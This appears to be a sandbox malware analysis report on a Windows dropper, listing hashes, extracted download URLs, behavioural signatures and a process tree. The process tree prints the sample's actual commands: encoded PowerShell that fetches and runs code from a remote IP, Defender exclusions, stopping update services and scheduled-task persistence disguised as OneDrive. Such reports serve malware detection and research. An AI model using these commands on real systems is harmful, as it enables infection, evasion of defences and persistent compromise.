Analysis
-
max time kernel
112s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
12/05/2023, 15:26
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20230220-en
General
-
Target
file.exe
-
Size
76KB
-
MD5
1deaa9be17e8122d78a470f44a58300a
-
SHA1
984147abf4e9f173eb233e0949d76e45dd77ef8a
-
SHA256
712f4d08ad4db1fb658d8206cee6a00f4024fd4ef5de8de0dfbe0d98779f9f86
-
SHA512
9a522a03887c38b16d7a34a08f3e9f4aded39066fc852575659b4320f5bb7e51693e7d5ca1715a6d67118fa7340d97309e5bf5869e2aa2ab63b7f0fed4fa10de
-
SSDEEP
1536:zcr6SNQrsMB3xVyalA9XbLxEC58dHPonAXBbKaAE2UHu90+E:FSNsJ/Vyaald+dQnAXBbKaAE2UH/+E
Malware Config
Extracted
http://62.204.41.23/o.png
Extracted
http://62.204.41.23/file.png
Extracted
http://62.204.41.23/r.png
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
description pid Process procid_target PID 1148 created 1248 1148 OneDrive.exe 14 PID 1148 created 1248 1148 OneDrive.exe 14 PID 1148 created 1248 1148 OneDrive.exe 14 PID 1148 created 1248 1148 OneDrive.exe 14 PID 1148 created 1248 1148 OneDrive.exe 14 PID 1148 created 1248 1148 OneDrive.exe 14 PID 1856 created 1248 1856 OneDrive.exe 14 PID 1856 created 1248 1856 OneDrive.exe 14 PID 1856 created 1248 1856 OneDrive.exe 14 PID 1856 created 1248 1856 OneDrive.exe 14 PID 1856 created 1248 1856 OneDrive.exe 14 PID 1856 created 1248 1856 OneDrive.exe 14 -
Blocklisted process makes network request 5 IoCs
flow pid Process 5 676 powershell.exe 6 776 powershell.exe 7 240 powershell.exe 10 776 powershell.exe 11 776 powershell.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Roaming\\Google\\Libs\\WR64.sys" services.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OneDrive.exe -
Executes dropped EXE 2 IoCs
pid Process 1148 OneDrive.exe 1856 OneDrive.exe -
Loads dropped DLL 2 IoCs
pid Process 776 powershell.exe 1944 taskeng.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\Tasks\OneDrive svchost.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1148 set thread context of 1760 1148 OneDrive.exe 48 PID 1856 set thread context of 1964 1856 OneDrive.exe 72 PID 1856 set thread context of 1260 1856 OneDrive.exe 79 -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1756 sc.exe 1976 sc.exe 376 sc.exe 1964 sc.exe 1964 sc.exe 456 sc.exe 1684 sc.exe 884 sc.exe 1056 sc.exe 988 sc.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1548 schtasks.exe 316 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 676 powershell.exe 1760 powershell.exe 240 powershell.exe 776 powershell.exe 776 powershell.exe 776 powershell.exe 1148 OneDrive.exe 1148 OneDrive.exe 808 powershell.exe 1148 OneDrive.exe 1148 OneDrive.exe 1148 OneDrive.exe 1148 OneDrive.exe 1148 OneDrive.exe 1148 OneDrive.exe 1148 OneDrive.exe 1148 OneDrive.exe 1472 powershell.exe 1760 dialer.exe 1760 dialer.exe 1760 dialer.exe 1760 dialer.exe 1148 OneDrive.exe 1148 OneDrive.exe 1856 OneDrive.exe 1856 OneDrive.exe 1172 powershell.exe 1856 OneDrive.exe 1856 OneDrive.exe 1856 OneDrive.exe 1856 OneDrive.exe 1856 OneDrive.exe 1856 OneDrive.exe 1856 OneDrive.exe 1856 OneDrive.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1784 powershell.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1964 dialer.exe 1856 OneDrive.exe 1856 OneDrive.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1248 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 services.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 676 powershell.exe Token: SeDebugPrivilege 1760 powershell.exe Token: SeDebugPrivilege 240 powershell.exe Token: SeDebugPrivilege 776 powershell.exe Token: SeDebugPrivilege 808 powershell.exe Token: SeShutdownPrivilege 1204 powercfg.exe Token: SeDebugPrivilege 1472 powershell.exe Token: SeShutdownPrivilege 1936 powercfg.exe Token: SeDebugPrivilege 1760 dialer.exe Token: SeShutdownPrivilege 872 powercfg.exe Token: SeShutdownPrivilege 692 powercfg.exe Token: SeDebugPrivilege 1172 powershell.exe Token: SeShutdownPrivilege 1868 powercfg.exe Token: SeShutdownPrivilege 432 powercfg.exe Token: SeDebugPrivilege 1964 dialer.exe Token: SeAuditPrivilege 860 svchost.exe Token: SeShutdownPrivilege 1812 powercfg.exe Token: SeDebugPrivilege 1784 powershell.exe Token: SeShutdownPrivilege 1160 powercfg.exe Token: SeLockMemoryPrivilege 1260 dialer.exe Token: SeLockMemoryPrivilege 1260 dialer.exe Token: SeLoadDriverPrivilege 464 services.exe Token: SeBackupPrivilege 464 services.exe Token: SeRestorePrivilege 464 services.exe Token: SeSecurityPrivilege 464 services.exe Token: SeTakeOwnershipPrivilege 464 services.exe Token: SeAssignPrimaryTokenPrivilege 860 svchost.exe Token: SeIncreaseQuotaPrivilege 860 svchost.exe Token: SeSecurityPrivilege 860 svchost.exe Token: SeTakeOwnershipPrivilege 860 svchost.exe Token: SeLoadDriverPrivilege 860 svchost.exe Token: SeSystemtimePrivilege 860 svchost.exe Token: SeBackupPrivilege 860 svchost.exe Token: SeRestorePrivilege 860 svchost.exe Token: SeShutdownPrivilege 860 svchost.exe Token: SeSystemEnvironmentPrivilege 860 svchost.exe Token: SeUndockPrivilege 860 svchost.exe Token: SeManageVolumePrivilege 860 svchost.exe Token: SeAssignPrimaryTokenPrivilege 860 svchost.exe Token: SeIncreaseQuotaPrivilege 860 svchost.exe Token: SeSecurityPrivilege 860 svchost.exe Token: SeTakeOwnershipPrivilege 860 svchost.exe Token: SeLoadDriverPrivilege 860 svchost.exe Token: SeSystemtimePrivilege 860 svchost.exe Token: SeBackupPrivilege 860 svchost.exe Token: SeRestorePrivilege 860 svchost.exe Token: SeShutdownPrivilege 860 svchost.exe Token: SeSystemEnvironmentPrivilege 860 svchost.exe Token: SeUndockPrivilege 860 svchost.exe Token: SeManageVolumePrivilege 860 svchost.exe Token: SeAssignPrimaryTokenPrivilege 860 svchost.exe Token: SeIncreaseQuotaPrivilege 860 svchost.exe Token: SeSecurityPrivilege 860 svchost.exe Token: SeTakeOwnershipPrivilege 860 svchost.exe Token: SeLoadDriverPrivilege 860 svchost.exe Token: SeSystemtimePrivilege 860 svchost.exe Token: SeBackupPrivilege 860 svchost.exe Token: SeRestorePrivilege 860 svchost.exe Token: SeShutdownPrivilege 860 svchost.exe Token: SeSystemEnvironmentPrivilege 860 svchost.exe Token: SeUndockPrivilege 860 svchost.exe Token: SeManageVolumePrivilege 860 svchost.exe Token: SeAssignPrimaryTokenPrivilege 860 svchost.exe Token: SeIncreaseQuotaPrivilege 860 svchost.exe -
Suspicious use of FindShellTrayWindow 21 IoCs
pid Process 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe -
Suspicious use of SendNotifyMessage 21 IoCs
pid Process 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe 1260 dialer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1096 wrote to memory of 1760 1096 file.exe 28 PID 1096 wrote to memory of 1760 1096 file.exe 28 PID 1096 wrote to memory of 1760 1096 file.exe 28 PID 1096 wrote to memory of 240 1096 file.exe 30 PID 1096 wrote to memory of 240 1096 file.exe 30 PID 1096 wrote to memory of 240 1096 file.exe 30 PID 1096 wrote to memory of 776 1096 file.exe 32 PID 1096 wrote to memory of 776 1096 file.exe 32 PID 1096 wrote to memory of 776 1096 file.exe 32 PID 1096 wrote to memory of 676 1096 file.exe 33 PID 1096 wrote to memory of 676 1096 file.exe 33 PID 1096 wrote to memory of 676 1096 file.exe 33 PID 776 wrote to memory of 1148 776 powershell.exe 36 PID 776 wrote to memory of 1148 776 powershell.exe 36 PID 776 wrote to memory of 1148 776 powershell.exe 36 PID 1868 wrote to memory of 1056 1868 cmd.exe 41 PID 1868 wrote to memory of 1056 1868 cmd.exe 41 PID 1868 wrote to memory of 1056 1868 cmd.exe 41 PID 1868 wrote to memory of 1976 1868 cmd.exe 42 PID 1868 wrote to memory of 1976 1868 cmd.exe 42 PID 1868 wrote to memory of 1976 1868 cmd.exe 42 PID 1868 wrote to memory of 988 1868 cmd.exe 43 PID 1868 wrote to memory of 988 1868 cmd.exe 43 PID 1868 wrote to memory of 988 1868 cmd.exe 43 PID 1868 wrote to memory of 1964 1868 cmd.exe 44 PID 1868 wrote to memory of 1964 1868 cmd.exe 44 PID 1868 wrote to memory of 1964 1868 cmd.exe 44 PID 1868 wrote to memory of 376 1868 cmd.exe 45 PID 1868 wrote to memory of 376 1868 cmd.exe 45 PID 1868 wrote to memory of 376 1868 cmd.exe 45 PID 1148 wrote to memory of 1760 1148 OneDrive.exe 48 PID 1980 wrote to memory of 1204 1980 cmd.exe 51 PID 1980 wrote to memory of 1204 1980 cmd.exe 51 PID 1980 wrote to memory of 1204 1980 cmd.exe 51 PID 1980 wrote to memory of 1936 1980 cmd.exe 52 PID 1980 wrote to memory of 1936 1980 cmd.exe 52 PID 1980 wrote to memory of 1936 1980 cmd.exe 52 PID 1472 wrote to memory of 1548 1472 powershell.exe 53 PID 1472 wrote to memory of 1548 1472 powershell.exe 53 PID 1472 wrote to memory of 1548 1472 powershell.exe 53 PID 1980 wrote to memory of 872 1980 cmd.exe 54 PID 1980 wrote to memory of 872 1980 cmd.exe 54 PID 1980 wrote to memory of 872 1980 cmd.exe 54 PID 1760 wrote to memory of 420 1760 dialer.exe 3 PID 1760 wrote to memory of 464 1760 dialer.exe 2 PID 1760 wrote to memory of 480 1760 dialer.exe 1 PID 1760 wrote to memory of 488 1760 dialer.exe 6 PID 1980 wrote to memory of 692 1980 cmd.exe 55 PID 1980 wrote to memory of 692 1980 cmd.exe 55 PID 1980 wrote to memory of 692 1980 cmd.exe 55 PID 1944 wrote to memory of 1856 1944 taskeng.exe 59 PID 1944 wrote to memory of 1856 1944 taskeng.exe 59 PID 1944 wrote to memory of 1856 1944 taskeng.exe 59 PID 1680 wrote to memory of 1964 1680 cmd.exe 64 PID 1680 wrote to memory of 1964 1680 cmd.exe 64 PID 1680 wrote to memory of 1964 1680 cmd.exe 64 PID 1680 wrote to memory of 456 1680 cmd.exe 65 PID 1680 wrote to memory of 456 1680 cmd.exe 65 PID 1680 wrote to memory of 456 1680 cmd.exe 65 PID 1680 wrote to memory of 1756 1680 cmd.exe 66 PID 1680 wrote to memory of 1756 1680 cmd.exe 66 PID 1680 wrote to memory of 1756 1680 cmd.exe 66 PID 1680 wrote to memory of 1684 1680 cmd.exe 67 PID 1680 wrote to memory of 1684 1680 cmd.exe 67 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:480
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:464 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:968
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2016
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:1100
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1116
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1040
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:484
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:284
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:860 -
C:\Windows\system32\taskeng.exetaskeng.exe {33506574-CF87-425E-9B2F-101BB9F34570} S-1-5-21-2647223082-2067913677-935928954-1000:BPOQNXYB\Admin:Interactive:[1]3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1856
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:816
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵PID:764
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:680
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:604
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
- Checks processor information in registry
PID:2020
-
-
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:420
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:488
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵PID:1540
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1248 -
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1148
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:676
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:808
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1056
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1976
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:988
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1964
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:376
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1204
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#huakaggax#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'3⤵
- Creates scheduled task(s)
PID:1548
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "OneDrive"2⤵PID:1284
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1172
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1964
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:456
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1756
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1684
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:884
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:1416
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#huakaggax#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'3⤵
- Creates scheduled task(s)
PID:316
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1260
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵PID:1208
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD528ff6d155581c169e25af9199d483f1a
SHA1befef7c7f5cdc3823e5e5790034e4654cbf7f203
SHA2565511d6e9ebf3a93412bb8aad521c7b6d21715d17ee36b719d946338cd973f026
SHA5129e3acbda5fab0ff6e86fd0a7259d912b294b69cf3c44796a1d8dca42cfeae953cfb1ff59d60522359e5a7765d4aca05744ba824cb790efd67234a353f4dcda5a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD528ff6d155581c169e25af9199d483f1a
SHA1befef7c7f5cdc3823e5e5790034e4654cbf7f203
SHA2565511d6e9ebf3a93412bb8aad521c7b6d21715d17ee36b719d946338cd973f026
SHA5129e3acbda5fab0ff6e86fd0a7259d912b294b69cf3c44796a1d8dca42cfeae953cfb1ff59d60522359e5a7765d4aca05744ba824cb790efd67234a353f4dcda5a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD528ff6d155581c169e25af9199d483f1a
SHA1befef7c7f5cdc3823e5e5790034e4654cbf7f203
SHA2565511d6e9ebf3a93412bb8aad521c7b6d21715d17ee36b719d946338cd973f026
SHA5129e3acbda5fab0ff6e86fd0a7259d912b294b69cf3c44796a1d8dca42cfeae953cfb1ff59d60522359e5a7765d4aca05744ba824cb790efd67234a353f4dcda5a
-
